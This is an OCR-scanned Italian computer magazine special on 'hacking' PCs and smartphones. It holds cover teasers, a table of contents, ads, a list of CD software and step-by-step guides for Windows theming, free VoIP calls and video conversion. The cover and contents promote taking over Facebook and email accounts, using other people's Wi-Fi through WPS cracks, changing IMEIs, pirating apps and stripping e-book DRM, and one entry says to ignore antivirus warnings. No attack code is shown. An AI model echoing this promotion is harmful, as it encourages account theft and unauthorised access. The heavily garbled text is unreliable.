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50 TUTORIAL 
PASSO PASSO 


TELEVISIONI DA HACKER 

PAY TV IN CHIARO 
SU YOUTUBE 

Film, serie TV e sport: oltre 
100.000 titoli sono già on-line. 



C'è chi sa come guardarli gratis! 

TUTTE LE APP 
A COSTO ZERO 

Ecco come i cracker sbloccano 
gli smartphone per installare 
gratis le app a pagamento 



Software e trucchi da veri smanettoni 
per potenziare il proprio dispositivo hi-tech 
con nuove e incredibili funzioni 


DA NON PERDERE! 


COSI TI RUBO 
LA PASSWOH 


ADSL HACKING! 

Solo noi ti diciamo 
come overdockare 
l'ADSL e superare 
i limiti di banda 


Con un notebook o un cellulare 
puoi bucare Internet e... 

✓ Impadronirti di qualsiasi profilo Facebook 

✓ Navigare gratis sfruttando l'ADSL altrui 

✓ Impossessarti degli account di posta e chat 

✓ Scoprire il saldo dei conti correnti on-line 


PIRATI DELLEBOOK 
ALL'ARREMBAGGIO 

Così gli smanettoni rimuovono le 
protezioni dai libri digitali acquistati 
su Amazon per condividedi on-line 


SOFTWARE COMPLETO 


GRATIS SUL WEB 
COL CELLULARE 

C'è chi "trucca" lo smartphone 
per agganciarsi alle reti Wi-Fi 


per agganciarsi alle reti Wi-Fi 
e navigare a "scrocco" 


SOFTWARE COMPLETO 


Hackeriamo Windows 
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50 funzioni che avresti sempre voluto sul tuo computer 
e che Microsoft non ti darà mai! 


DA PC E TABLET 

Quando ti colleghi ad Internet dallo 
Smartphone qualcuno potrebbe 
spiarti. Difenditi così! 


£ Telefonare, inviare SMS 

e videochiamare a costo zero 

1 —tb Guardare e registrare gratis 
tutti i canali della Pay TV • 

rA Telecomandare il computer 

^ d ua l s * as ' cellulare 

Attivare un canale anonimo 
per il download da eMule & co. 

« - li irinr 1- -n r — 

Convertire video e musica per 

J gustarseli su cellulari e player MP3 

+ . Installare i giochi della console 

su PC e divertirsi alla grande... 



SÌ SBLOCCO 

HO CELLULARE 

:ome modifico 
ice IMEI per superare 
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il saldo dei conti correnti on-line 


non autorizzate per Windows 
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Telefonare, inviare SMS 
e videochiamare a costo zero 


Telecomandare il computer 

da qualsiasi cellulare 


p 

Guardare e registrare gratis 
tutti i canali della Pay TV 


Attivare un canale anonimo 
per il download da eMule & co. 


Software e trucchi da veri smanettoni 
per potenziare il proprio dispositivo hi-tech 
con nuove e incredibili funzioni 


CONFESSIONI DI UN PIRATA 


COSI TI RUBO 
LA PASSWOI 


Con un notebook o ufi cellulare 1 
puoi bucare Internet e... • A, 

✓ Impadronirti di qualsiasi profilo Faceboc 

✓ Navigare gratis sfruttando l'ADSL altrui 
\/ Impossessarti degli account di posta e chat 
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ADSL 
HACKING! 

Trucchi da smanettoni 
per overclockare 
l'ADSL e superare 
i limiti di banda 


COSÌ SBLOCCO 
IL MIO CELLULARE! 

Ecco come modifico 
il codice IMEI per superare 
le limitazioni imposte 
dal gestore telefonico 
























www.hostmgsolutions.it 


seguici su UHHD ^3 



FATTI TROVARE 


1 utente su 3 naviga da smartphone: non perderlo! 



Scegli goMobi: 

m FACILE una procedura guidata per creare ex novo il sito mot 
m VELOCE poche mosse per trasformare il sito desktop in mol 
M GRATIS 1 mese per non poterne più fare a meno 


Hosting Solutions è il punto 
di riferimento per l'hosting. 
Tecnologia, innovazione e qualità 
al servizio delle esigenze dei clienti. 


Hostingsolution 
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Hackeriamo Windows!.8 

Le 50 funzioni che aviesti sempie voluto pet 
il tuo computer e che Microsoft non li darà mai' 

Hacker il disco segreto.16 

Abbiamo "smanettato" con il kit che buca la 
rete e attiva un canale autorizzato sul PC del 
malcapitato 


macchina perfetta per scommesse sicure e vin¬ 
cite facili Svelati i retroscena 

'l 

Gratis su Internet con il cellulare. .66 

C'è chi "trucca'' lo smartphone per agganciarsi 
alle reti Wi-Fi della propria città e navigare a 
costo zero 

Root del cellulare basta un clic! . .68 


Cosi entri in qualsiasi computer. .26 

Ecco la tecnica usata dai pirati per intercettare 
le connessioni di Rete F cosi accedere a 
qualunque PC diventa un gioco da ragazzi 

Nella fabbrica dei crack software 30 

Viaggio tra i nodi underground del Web alla 
scoperta delle tecniche proibite che sbloccano 
tutte le funzioni dei programmi a pagamento 


Vuoi sbloccare lo smartphone Android ma non 
sai come fare? Con le nostre dritte puoi riuscirci 
in pochi secondi! 

Cosi sblocco il mio cellulare.70 

Confessioni da un pirata; ecco come modifico 
il codice IMEI per superare le limitazioni imposte 
dall'operatore telefonico 


Il disco sblocca password.34 

Non riesci ad accedere al PC e ad avviare 
Windows? Così recupeii i dati archiviati] 



Entra con noi nella Internet 
invisibile.4C 

Esiste una Rete segreta dove circolano film, do¬ 
cumenti riservati, software.. pronti al download! 

ADSL gratis col crack del WPS... 46 

Le nuove tecniche dei pirati per navigare a scroc¬ 
co. Sei sicuro che il tuo router non sia a rischio? 
Scoprilo subito! 


Lo scaricatutto per iPhone.72 

Grazie ad un nuovo tool gli smanettoni si procu 
rano gratis le applicazioni a pagamento dell'App 
Store. Ecco come! 

igare anonimi col telefonino. .74 

?u#fdfcticolleghi ad Internet dal tuo smartpho • 
neiTfqMHno potrebbe spiarti! Solo noi ti dicia¬ 
mo come 9lt <£9^y]i£piiyacy 

Il file sharing dallo smartp .. 76 

Con un telefonino Android e i • 

giuste, è possibile scaricare di tutte? 
dalle reti P2P.. 



Super ADSL col CD 

di Win Magazine.48 

130 trucchi suggeriti dai nostri esperti per dare 
ancora più gas alla connessione Internet Potrai 
così scaricate e condividere davvero di tutto alla 
massima velocitàl 

Metti al sicuro la tua LAN.54 

restiamo la rete evidenziandone tutte le 
vulnerabilità, prima che siano sfruttate dai pirati. 
Si fa così 


L'aspira password per cellulare . .78 

C'è chi trasforma il proprio dispositivo mobile 
m un peifetto passepartout per scardinare 
qualsiasi protezione 

Pirati degli e-book 
all'arrembaggio!.80 

Ecco come fanno gli smanettoni a togliere le 
protezioni dai libri digitali acquistati su Amazon 
pei condividerli on-line 


E tutto gratis, basta 

una password.58 

Sky, Mediaset Premium, giochi e software . 
c’è una chiave segreta per accedere a tutto! 

E c'è chi l'ha già trovata 

"Trucco il PC e vinco sempre!,,... 60 

L'hacker dei giochi di azzardo ci ha guidato in 
un mondo underground dove il PC diventa una 


Cellulare: stop agli intrusi.82 

Ecco come proteggere le informazioni conserva¬ 
te nella memoria interna di sniditplione e Idblet 
inibendo l'accesso alle app e alle funzioni del 
dispositivo 

Smartphone sotto attacco!.84 

Ecco come fanno i pirati informatici a rubare 
i dati personali e i messaggi SM5 inviati da 
un iPhone 


Tutti esperti del PC 
con le grandi guide 
di Win Magazine 

A grande richiesta, ritornano in edicola I qua¬ 
derni tematici di Win Magazine Così come è 
stato fatto in passato, la redazione ha selezio¬ 
nato cinque argomenti prendendo spunto dalle 
richieste che avete inoltrato via e-mail al team di 
Win Magazine. 

Windows 8: la grande guida. Computer & 
Tablet dell'Hacker, Megavideo 8. Co I cana¬ 
li segreti, Investigatore informatico col PC, 
Software Gratis con codici seriali questi so¬ 
no i titoli dei nuovi Speciali. Guide passo passo, 
trucchi avanzati e consigli degli esperti, ti aspet¬ 
tano all'interno delle 500 pagine delle riviste 
Senza dimenticare i supporti multimediali alle¬ 
gati dove troverai centinaia di software gratui¬ 
ti che ti permetteranno di mettere in pratica le 
nostre idee. Ce n'è per soddisfare tutti dal ne¬ 
ofita all'appassionato di computer, dall'assetato 
di sapere tecnologico al fedele seguace di Win 
Magazine 

Non perderne nemmeno uno! In totale sono 10 
pubblicazioni: i prossimi 5 Speciali di Win arrive¬ 
ranno in edicola a partire da metà dicembre. 
Collezionali tutti' 


La redazione 


chiaro su YouTube! ... .86 

Film, serie TV, sport e cartoon: oltre 100.000 titoli 
sono già on-line. C'è chi sa come guardarli su 
computer e televisore senza pagare alcun 
abbonamento! 

Dati a prova d'intercettazione... 90 

Così proteggi i documenti memorizzati sul tuo 
disco rigido e ne rendi impossibile la lettura 
ad occhi indiscreti 

La maschera per essere anonimi..92 

Pdutd di esseie spidti? Cui i le i luslie diitle e il 
software giusto possiamo navigare come fanta¬ 
smi della Rete 

Una giornata da hacker.94 

Con un piccolo 'aiuto" tecnico abbiamo provato 
tecniche di attacco 'proibite' Ecco svelati tutti 
i retroscena 



I prezzi di tutti i prodotti riportati all'interno della rivista potrebbero subire variazioni e sono da intendersi IVA inclusa 


4 Win Magazine Speciali 
























PROFESSIONAL 
LASER KILLER 


Serie WorkForce Pro 


La serie WorkForce Pro è progettata per il tuo business. Questa 
gamma di stampanti e multifunzione inkjet offre un risparmio sui 
costi per pagina fino al 50%. stampa più velocemente i documenti di 
poche pagine e consuma fino all'80% in meno rispetto alle stampanti 
laser a colori più vendute'. Con la stampa fronte/retro automatica 
ad altissima velocità, le taniche facili da sostituire senza lasciare 
residui di inchiostro, la grande convenienza e la semplicità di utilizzo, la 
gamma WorkForce Pro è la scelta giusta per rinnovare le stampanti 
laser del tuo ufficio. 

Per maggiori informazioni, visita il sito www.epson.it/workforcepro 

• Rispetto ai 10 modelli piu venduti in specifici mercati e periodi. Il confronto varia m base 
alte caratteristiche 


„ EPSON 

EXCEED YOUR VISION 



»»> 


Più veloci 


50% Risparmio sui costi per pagina fino al 50% 


80% 


Consumi energetici inferiori fino all’80% 
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Tank Assault 

Divertiti coi carri armati 

rito: Tank Assaullvip 2^00 KB t>eeve»e 

Alien Terminator Deluxe k I 

Il pianeta terra è in pericolo. Toc¬ 
ca a te difenderlo! Raccogli più 
armi possibili e fai piazza pulita 
di creaturine verdi! 

Ffc: Atev ! un «nata w 39.164 KB heeware 

Desert Hawk il 

Hai un obiettivo, distruggere la 
base terroristica creata dai tuoi 
nemici. Vola nei cieli e fai piaz¬ 
za pulita di tutto quello che in¬ 
contrerai. 

File DessftHawk..’ip 17.666 KB KB ireewac 


Nmap >.oi 

Controlla lo stato della tua rete 

Ffle; NMAPjf 25.534 KB Itwwae 

Download Accelerator Plus 

Incrementa la velocità dei tuoi 
download 

File: ifeplO/» 10305 KB Ireeware 


Auslogics Internet 


BB 




CD-ROM 


, «'.D 


M -roo}^ hack 




Simp 
Forwa 

Apri al volo le f 

Me: SraptePoitFWnp? 

Google Chrome il 

Il dient P2P per il download di 
film, musica e programmi 

FBe: Clwnenp 1.967 KB Irtewut 


Optimizer io 

Ottimizza la tua connessione a 
Internet 

Fte:intertìplviiiffiivei 5.971 KB Ireanre 

Ultrasurf 707 

Naviga sul Web in sicurezza e 
anonimato 

File: UUrasuriyto 388 KB f'eeware 

HttpWatch Basic Edition si9 

Effettua verifiche di sicurezza su 
siti e applicazioni Web 

Fife: httpvrclduip WTiBKBIretwure 


25.4.0 

ito controllo la 



Dropbox u 

Scarica e condividi i file sul Web 
solo con chi vuoi tu 

Be:dropbuxexe 14 446 KB limare 

X-Lite a 

Effettua videochiamate tramite 
VolP 

File X-liffiàp 15 715 KB Ireewat! 

Lion Transformation 
Pack : i l 

Cambia look al tuo Windows. Ap¬ 
plica l'elegante interfaccia di Mac 
OS X107 

Fae:LtPl3pà0.611 KB firmware 

Win eMule r il 

Scarica senza intoppi con l'esclu¬ 
siva versione di Win Magazine 

File. Win-elikfejp 5611 KB KB Ireewae 

CMOS Password so 

Come accedere alla password di¬ 
menticata del BIOS 

Rle.cinaspwdTiii 106 KB fimare 

Cain&Abel 943 

Un pronto recupero per le pas¬ 
sword perdute 

File canabei m 5.518KBIreewwe 

Steganolmage il 

Nascondi file e messaggi nelle 
foto 

FBe: $teganolnv>oc; ap 5.440 KB treewarc 

EncryptOnGick ini 

Cripta i tuoi file con un click 

File. EncivpftliiCtekZK) 1 575 KB limare 


PRODOTTI COMPLETI 






LEGENDA | 

w ^Software in italiano 




WINWEBEXPLORER il 

Entra con noi nell'Internet invisibile 

Esiste una Rete segreta, 10 volte più estesa 
del Web che conosciamo, dove circolano li¬ 
beramente documenti riservati, film, software, 
musica e tanto altro materiale hot... pronto al 
downloadlEntrarci non è facile. Ma coi nostri 
trucchi puoi farlo anche tu! 

■ Italiano: ■ S.O.: Windows 2000/XP/Vista/7 ■ Dimensione: 12 MB 

■ File : WmWeutjqjlorer jrp 


COMPLETE INTERNET REPAIR izs 

Problemi con la connessione Internet? 
Risolvili cosi! 

Questo tool si propone di risolvere i problemi di con¬ 
nessione a cui va incontro la nostra ADSL Le opera¬ 
zioni sulle quali va a operare il software sono nume¬ 
rose e tra queste troviamo come resettare il protocol¬ 
lo internet (TCP/IPI, la riparazione del Winsock, come 
pulire la cache DNS, la messa a punto dei protocolli 
SSL/HTTPS e come ripristinare i file di host predefiniti. 


a Italiano: ■ S.0 : Windows 2000/XP/Vista/7 1 
■ Filo: iiileiReiaiuio 

IP Covrirtele Internet 3cp»r l ;■ g ]2&6 
ita &4>mmffnh Qptwni ? 


Dimensione: 433 KB 


A s 

Wr 


Welcome tt> Aazona Complete Irti mot Rapir Mwd 
(•ow moggi cver or oDOcn s lece to vi» ti 
ttascnotion Setact youv ’oo* «r cptipne end prie* Gei' 
«ari. Do not eeted ootioci unii» vour compite' 
thi oeepnbeo rvotrtirrw. 


r M*et Internet Proteo» (TCP/»») 
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Hide Foiders 

Nascondi file e cartelle 
da occhi indiscreti 

Fife Hxtefoidosjip 2249 KB (reffwnrp 

Cyberduck 42 1 

Oient FTP per trasferire file in 
Rete 

FAe: Cylwrluclaip 13.509 KB Irwware 


AUDfO&VIDEO 


VLC Media Player 1 in U 

Streaming video in rete LAN e 
anche dalla Webcam 

fite : VUliip 9078 KB rreewttt 

Calibre + Plugin O 

Calibre, il famosissimo 
ebook reader per PC e non 
solo si arricchisce con un 
utilissimo plugin in grado 
di rimuovere le protezioni 
del libri scaricati in formato 
digitale di qualsiasi esten¬ 
sione! 

Fife edtoefli SO 000 KS fretvare 


fi. » 


* V t y o«n 


XMedia Recode 14,6 

Convertitore audio/video 
che supporta la pressoché 
totalità degli standard e che 


Stato 

State d non nconorcuo 


® 

0 


permette di convertire fa¬ 
cilmente la musica e i film 
nello standard preferito. 

FA: KfAiMleaKWliOfli 7710 KB 
IrcewKK 

ImageGrab u.6 

Estrai le immagini dai tuoi 
filmati 

fSe: imaoefltah 50jj» 1.920 KB fiecware 





POPPeeper &i.o 

Il dient di posta da taschino! 

fife: PQFPeepfr-li istmi» 1700 KB 
tiwware 


Recuva w/ 7 s O 

Ripristina tutti i file cancellati 
per sbaglio 

Fife: Recuva ai 2 246 KB harware 

TritaFile io i I 

Eliminiamo definitivamente 
i file dallhard disk 

File. liner ife.’ip 680 KB Irrevas 

uTorrent 3 ; I ■ 

Sfrutta la rete Torrent per 
scaricare sempre al massimo 

File; ulomtit flp 389 KB frssware 

Adobe Reader 11 K 1 

Visualizziamo e stampiamo 
i documenti in PDF 

File. McteRdrfbi» 75B40 KB Iwww 

Avidemux Final > 6 iO 

Video editing di qualità 
per tutti i nostri filmati 

File amtemiuTip 19.626 KB frwwaiB 


2.7 



Fai 


3tnwwKf. 


*1 l 


» ti 


W Ujo PC 

Vjk 


Orbit Downloader O • 

Un nuovo download mana¬ 
ger basato su tecnologia P2P 

Fife. Mae 27163 KB heewae 

7-Zip : <A)U 

Compattiamo i file nel nuovo 
formato 7z 

Fife' 7w4> 2.367 K8 freewre 



Mali 

Blocca tutti i 
all'azione dei r 

Fin Àiit-tol<wn>4i22 

eMuleasdrtSJ 

Il dient P2P per scaricare 


di tutto e di più dalla rete 

Fìe. tMufeOSOzip 3195 KB travate 

Adobe Flash 
Player O 

Visualizza correttamente 
le pagine Web 

Fife' IWitAiytf Tip 3.437 K 8 liecware 

K-Lite Mega Codec Pack 7 

Tutti i codec per applicazioni 
multimediali 

fife khicafecÀi 23071 KBIirewats 

Adobe Shockwave 
Player ir,9.620 i l 

Permette di visualizzare sul 
browser i contenuti multime¬ 
diali presenti sul Web 

File: Slw.kwJVB.il» 9393 KB Ireewant 

Avast ;i l 

Protezione totale per il PC 

Fife. Avm)8itp 108.985 KB liwvmu 

Comodo Personal 
Firewall s 10 1 1 

Difendi il tuo computer da 
ogni attacco 

Fife Cnmotlof walzw 15.8941 KB Irwwatt 


SPECIALE GRANDE 
FRATELLO NEL 
CELLULARE " 


WCleaner Beta per 


Tastiera Swiftkey il 

La tastiera che ti legge nel 
pensiero 

S.O.- Anonwt 2.1 e aperitivi 7JJTKJ KB Trini 

Gestore 3G 

La tua connessione sempre 
al sicuro 

Si) Anita! 21 e suonimi 236 KB Inai 

ownCloud 11 

Una piattaforma che ti per¬ 
mette di sincronizzare e vi¬ 
sualizzare facilmente i tuoi file, 
contatti, calendari e segnalici 

SO.. Androirl 21 e s>hwwi 1300 KB Ira) 

Airdroid v LI 

Lo Smartphone entra nel tuo PQ 

S.O.: Arvnwd 21 e superari 6 500 KB 
ItWWOT 



Cerberus Antifurto il 

L'antifurto per lo smartphone 

$.0. Androni il ? apertoti 7ò£ KB Tri* 

tP Coodouto Certwu* 
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TOR BROWSER 2 . 2.39 i I 

Naviga e scarica da Internet senza lasciare tracce 

Come ben sappiamo, quando navighiamo siamo 
identificati nel grande mare di Internet mediante un 
indirizzo IP univoco. È un po' come effettuare una 
chiamata: il destinatario (nel caso spedfico il sito Web 
raggiunto) è in grado di conoscere il nostro numero 
(TIP) ed eventualmente localizzarci su una mappa ge¬ 
ografica. Il software permette di navigare in maniera 
anonima perché non solo è in grado di nascondere il 
nostro IP, ma anche di mascherare il traffico Internet 


1 telano: ■ SO.: Windows XPAfcta/7 1 
iFile:Toiftws 8 t 4 i 


Oimenaone: 21286 KB 


FREEMAKE VIDEO 
CONVERTER 3 . 0 . 2.12 n 
Convertì i tuoi filmati con un die! 

Consente di convertire file audio/video e foto in po¬ 
chi clic. Supporta più di 200 formati, ottimizzandoli 
anche per i dispositivi mobili (iPod, iPhone, iPad, 
PSP, PS3, Androidi, e masterizza i contenuti su DVD 
e Blu-ray II software è anche in grado di convertire 
direttamente i video da più di 40 siti Internet (You- 
Tube, Vimeo, ecc). Attenzione: durante il setup viene 
proposto di attivare Facemods (banner pubblicitari a 
supporto dello sviluppo del programma), lasciando 
però la scelta finale all'utente. 
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1 Italiano: ■ S.O.: Windows XP/Vfeta/7 ■ 
1 Fìe: Freematezip 


Dimensione: 22 . 3 S 9 KB 






m 1 

•- wrv 


■7 -a a & 


CAIN& ABEL *9*3 

Un pronto recupero per le password perdute 

Il programma è uno sniffer in grado di analizzare tut¬ 
to il traffico che scorre sulla rete. In pratica, il software 
analizza le tante informazioni che transitano sulla 
nostra connessione mostrandole ordinate e in for¬ 
ma leggibile. Ideale soprattutto per recuperare pas¬ 
sword smarrite e controllare le connessioni attive del 
computer (sia in entrata che in uscita). Attenzione: 
durante l'installazione di Cain & Abel alcuni antivirus 
potrebbero rilevare il software come un possibile 
pericolo. Ignoriamo tranquillamente gli avvisi e termi¬ 
niamo la procedura di setup. 


1 10.: Windows 2000/XPAfeta/7. 
iFfecaw-abelzip 


Dunensone: 6.518 KB 
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Cosa ci 
occorre 


TOOl Di CONVÈRSA 
VIDEO 

FREEMAKE 

VIDEO 

CONVERTER 

vis, ✓CD 


Sito internet 

www.cordiatel. 

com/softphone 

TEMA PER WINDOWS 

UON 

TRANSFORMATION 

PACK 

tiovi si ✓CD 

mimmmubì 

Sita liTteniBt- 

www.windowsxlive.net 

CLIENT DI RLE SHARING 

WIN-EMÙ LE 1.5 

• li ✓CD 


SOFTWARE COMPLETO 


Sito tntetnet: 

www.winmagazme.it 

PLAVER MULTIMEDIALE 

VLC 2.0.1 

U- .'irvi Si ►'CO 

Sita Internet 

www.videotan.org/vlc 

iP CAM ScNZA RI I 

D-UNK DCS- 
932L WIRELESS 
NIRNETWORK 
CAMERA 

€ 120ou 

Sito internet 

www.dlink.it 


A bbiamo appena formattato il PC e rein¬ 
stallato Windows? Il sistema adesso è 
veloce e reattivo come non mai, ma ci 
rendiamo subito conto che senza le opportune 
modificheeaggiunteè fin troppo limitato. L’in¬ 
terfaccia Aero, ad esempio, è curatissima, ma 
a qualcuno potrebbe piacere personalizzarla a 
dovere, magari facendola somigliare alla grafica 
più "stilosa” dei Mac... serve il tool giusto! Per 
non parlare di funzioni come le telefonate dal 
PC: scordiamocele con Windows! K necessario 
ricorrere a strumenti esterni che, se scelti con 
dovizia, ci permettono di spendere poco o co- 
. munoue di risparmiare sulla bolletta telefonica. 
' Qu an to ha detto file sharirjg? Senza unclient, 

1 , ^J )< cibile alcun tipq di scambio con la 
retSiff’^pPhe in questo caso bisogna saper 
sceglierWfcsoluzione migliore. Insomma, per 
attivarequestee tante altre funzioni, Microsoft 
non ci dà una mano, dobbiamo cavarcela da 
soli e dobbiamo farlo nel modo giusto, andando 
a colpo sicuro ed evitando di installare tanta 
"spazzatura" nel nostro PC pulito. 

Cogli l’ultima mela 

L’integrazione di Aero, componente che ha se¬ 
gnato una svolta nelle interfacce grafiche degli 
ultimi sistemi operativi Windows, e la rivoluzio¬ 
naria modifica alla barra delle applicazioni vista 
nell’ultimo nato in casa Microsoft, ha migliorato 
notevol mente l’esperienza d’uso del sistema e dei 
suoi strument i. Nonostante ciò, una cosa è certa, 
la grafica dell’interfaccia utente degli OS Apple 
è senz’altro molto più affascinante e comoda da 
utilizzare. Senza rinunciare al nostro amato 
PC Windows, anche noi possiamo godere del le 
caratteristiche offerte dall'interfaccia utente di 
Lion, l'ultimo OS uscito dai laboratori Apple. Ciò 
è possibile grazie a Lion Transformation Pack, 
u n tool che può trasformare la grafica dei sistein i 
operativi Windows per farle assumere l’aspet io 
di quella dei Mac OSX Lion. 


MTZ 


; 




e Smartphone degli Hacker 


Hackeriamo Windows! 




Hackeriamo 
■Windows! 


Le 50 funzioni che avresti sempre 
voluto per il tuo computer e che 
Microsoft non ti darà mai! 
















WINDOWS PIU POTENTE CHE MAI CON LE NOSTRE GUIDE PRATICHE 



Telefonare, inviare SMS 
e videochiamare 

a costo zero 



4 Attivare un 

canale anonimo 
per il download 

da eMule & co. 


« Guardare e registrare 
gratis tutti i canali della 
PayTV 




4 





% 


Telecomandare 

il PC da qualsiasi 
cellulare 


Convertire video e musica 

per gustarseli su cellulari, 
player MP3... 


Trasformare 
gratis il PC in % 

( un Mac trendy 
e potente 


a „ Installare i giochi 
* della console su PC 

e divertirsi alla grande 



Videosorvegliare casa 

con la Webcam... anche 
da telefonino 


Computer e telefono 

Grazie a Internet oggi possiamo abbattere le 
distanze e chiamare in tutto il mondo senza 
spendere nulla, o nella peggiore delle ipotesi, 
al costo di una telefonata urbana. "Ritto ciò è 
possibi le grazie alla tecnologia Voli’ (Voice Over 
IP) che ci permette di telefonare sfruttando il 
Web. Il Voi l’offre molti più vantaggi rispetto alla 
linea telefonica tradizionale, come ad esempio 
la possibilità d ì utilizzare un numerogeografico 
anche senza disporre di una linea telefonica 
Telecom. Il Web, inoltre, mette a disposizione 
molti strumenti per le comunicazioni. Con il 
noto Skype, ad esempio, possiamo effettuare 
videochiamate in pochi semplici clic. F. se vo¬ 
gliamo inviare un SMS? Dal PC è un gioco da 
ragazzi ed è completamente gratis se ricorriamo 
a un sito come www.freesms.net Se da un lato 
c'è chi è interessato a usare il PC come telefono, 
dall’altro troviamo gli smanettoni che usano gli 
smartphone per pilotare il computer. Come se 


fosse un telecomando, il telefonino può essere 
usato per passare da un video all’altro o alzare/ 
abbassare il volume, con tanto di funzioni per 
navigare nei file archiviati nell’hard disk del PC, 
avviarne la riproduzione e gestire le playlist. 

P 2 P, videosorveglianza 
e molto di più 

Chiù nque volesse usare il PC per il file sharing 
si rende conto subito dei limiti del sistema Mi 
erosoti a riguardo. Senza un apposito client è 
praticamente impossibile! E quello più famoso, 
il Re incontrastato del file sharing, è sicura 
mente eMule. I n queste pagine, impareremo a 
utilizzarlo al meglio e faremo molto di più: ne 
installeremo una versione potenziata a dovere 
direttamente del Win Magazine LahS: Win 
eMule. Per risolvere i problemi di sicurezza 
della versione ufficiale, la nostra release del 
Mulo integra un potente antivirus, che tiene alla 
larga ogni possibile minaccia dal nostro PC un 


uti le mod u lo a nt i fa ke, che consente di scaricare 
solo ciò che effettivamente si sta cercando, C un 
sistemadi aggiornamento automatico dei server 
su cui connettersi, che evita di imbattersi in 
collegamenti creaii ad lux per diffondere virns 
oppure utilizzati dalle ntajor cinematografiche 
e musicali per tracciare gli utenti e combattere 
la pirateria. Vista la diffusione di Webcam e IP 
Cam, altro argomento molto sentito da chi usa 
il PC è la videosorveglianza. Grazie a questi 
sistemi di protezione è possibile monitorare 
casa, il posto di lavoro, la stanzetta dei bambini 
anche quando siamo fuori casa, direttamente 
dal nostro smartphone, e senza far piangere il 
nostro portafogli, vista ('accessibilità di molti 
modelli sul mercato. Questi e molti altrfiar- 
gomenti sono trattati in questo speciale che 
dedichiamo all'hacldng creativo del nostro 
sistema operai ivo. Con le nostre dritte, Windows 
sì arricchirà di funzioni che Microsft non ha 
previsto e che probabilmente non lo farà mai! 
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| Hackeriamo Windows! | 


V PC e Smartphone degli Hacker 


Interfaccia in perfetto stile Apple 

Utilizziamo la comoda e gradevole interfaccia utente dell’OS Lion senza spendere un capitale per acquistare 
un computer Apple... basta installare il Lion Transformation Pack! 





Prima i preliminari 


^ Disabilitiamo UAC 



■J i Prima di avviare la trasformazione, a scopo 
- -, precauzionale, creiamo un punto di ripristino 
del sistema. Per farlo, apriamo il menu Start, digitiamo 
Creare un punto di ripristino nella 
e diamo Invio. Clicchiamo su Crea 
nome e confermiamo con Crea 


2 Dal menu Start accediamo al Pannello di 
controllo e facciamo clic su Account utente. 
Clicchiamo sul collegamento Modifica le impostazioni 
di Controllo dell'account utente e spostiamo il selet¬ 
tore in basso (Non notificare mai). Confermiamo con 
e riawiamo il sistema 




^ Un paio di clic ed è fatta 

^ I Leviamo la spunta dalla casella Set Windows 
X’s Live as default home page nel caso la 
trasformazione debba avvenire su Windows XP spun¬ 
tiamo la casella Large icon size. lasciamo tutte le altre 
opzioni cosi come proposte e avviamo la metamorfosi 
cliccando su Instali 


Saluta la vecchia interfaccia 

5 L'operazione richiederà qualche minuto, atten 
.. ' diamo con pazienza che file e temi deU'inter- 
faccia di Windows siano modificati e al termine clic¬ 
chiamo su Ok per riawiare il sistema. Ritornati al 
desktop saremo accolti dall'interfaccia utente che 
caratterizza i sistemi della Mela. 


^ Pronti per Tinstallazione 

0 Accediamo sul Win CD-ROM, scarichiamo 
: l'archivio compresso LTP1.zip e decompri¬ 
miamolo in una cartella dell'hard disk. Clicchiamo 
con il tasto destro del mouse sul file Lion Transfor¬ 
mation Pack 1.0. exe e selezioniamo la voce Esegui 
come amministratore 



* Un Leone per amico 

0 Mentre prendiamo confidenza con la nuova 
— grafica e la Dock in perfetto stile Apple, pre 
sente in basso al posto del menu Start e della barra 
delle applicazioni ora situati in alto, clicchiamo sul col- 
legamento che raffigura degli ingranaggi e riportiamo 
UAC ai valori predefimti (Passo 2). 



RITORNO 
ALLE ORIGINI 

Quando vorremo ritor¬ 
nare alla vecchia grafica 
di Windows, non dovre¬ 
mo far altro che esegui¬ 
re nuovamente il file 
Lion Transformation 
Pack 1.0.exe, cliccare su 
Uninstatl e confermare 
con OK per riavviare il 
sistema. 


CONVERTI VIDEO E MUSICA PER QUALSIASI DISPOSITIVO 


I filmati girati con la videocamera digita¬ 
le non sono compatibili co) tuo player da 
tavolo? Il lettore MP3 non digerisce al¬ 
cuni brani audio della tua collezione? Se 
vogliamoavere la massiirta compatibilità 
dei nostri file multimediali, dobbiamo 
ricorrere a un convertitore. Freemake Vi¬ 
deo Converter (lo trovi sul CD-fiom) è un 
programma che si distingue per la chiara 
ed elegante interfaccia grafica, in grado 
di effettuare qualunque conversione 
di formati multimediali. Per convertire 
un video (le operazioni sono analoghe 


per i file audio) avviamo il programma 
e clicchiamo sul primo pulsante in alto 
a sinistra. Video. Selezioniamo i filmati 
da caricare e premiamo Apri Nella barra 
inferiore di Freemake Video Converter 
sono disposte le icone relative ai vari 
formati di conversione. Clicchiamo su 
quello desiderato, ad esempio AVI, poi 
su Converti e attendiamo che l'opera¬ 
zione termini. Alla fine, clicchiamo su 
OK. Se desideriamo vedere subito i file, 
clicchiamo su Visualizza nella cartella 
(in alto a destra). 
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Telefona gratis col computer 


Grazie a Messagenet otteniamo a costo zero un numero di rete fissa col prefisso della nostra 
città. Potremo telefonare gratis verso altri utenti del servizio. 



x Un vero numero di telefono 



; Colleghiamoci al sito www.messagenet.rt, cucchiamo su VolP 
J nel menu in alto e selezioniamo jreenumber. A destra della 
nuova pagina, scegliamo il prefisso teiem^da Prefisso e confer¬ 
miamo con Attiva ora Cicchiamo RegmfymÈ\^:\ pagina per 
proseguire con la procedura di registrazione deU 


smm in 


x Serve una verifica 

2 Spuntiamo Ho preso visione dell'Informativa elenchi tele¬ 
fonici e cicchiamo Prosegui. Inseriamo e-mail e numero 
di cellulare necessari alla verifica della nostra identità, e cicchiamo 
Prosegui. Riceveremo un SMS di controllo e un e-mail con un link da 
cliccare. Inseriamo il codice ricevuto via SMS e premiamo Prosegui 



x Ecco i parametri VolP 

Cicchiamo Prosegui e compiliamo il Modulo di registrazio¬ 
ne Premiamo Prosegui, controlliamo che i dati siano corretti 
e cicchiamo Conferma. Messagenet ci chiederà di confermare l'indi¬ 
rizzo di casa al quale associare il numero VolP: terminiamo con Con¬ 
ferma Riceveremo un' e-mail con i parametri di configurazione VolP, 


x Installiamo il Windows back! 

4 Scompattiamo l'archivio XLite.zip (lo troviamo sul CD-Rom) 
ed eseguiamo l'EXE contenuto al suo interno per installare il 
software. La procedura guidata ci permetterà di portare a tennine il 
tutto in pochi secondi. Se il wizard ci chiede di installare un compo¬ 
nente aggiuntivo, confermiamo senza preoccuparci. 


User IO: : 5381463 


Domar) sip messagenet 45061! 


Password 


1 ! 


Display name ! 
AumonzaBon name ( 


ELI 


Softphone View Contacts 

Avariatile -v ^ 

Help 

P* fi ! « ~i 


Cai! 

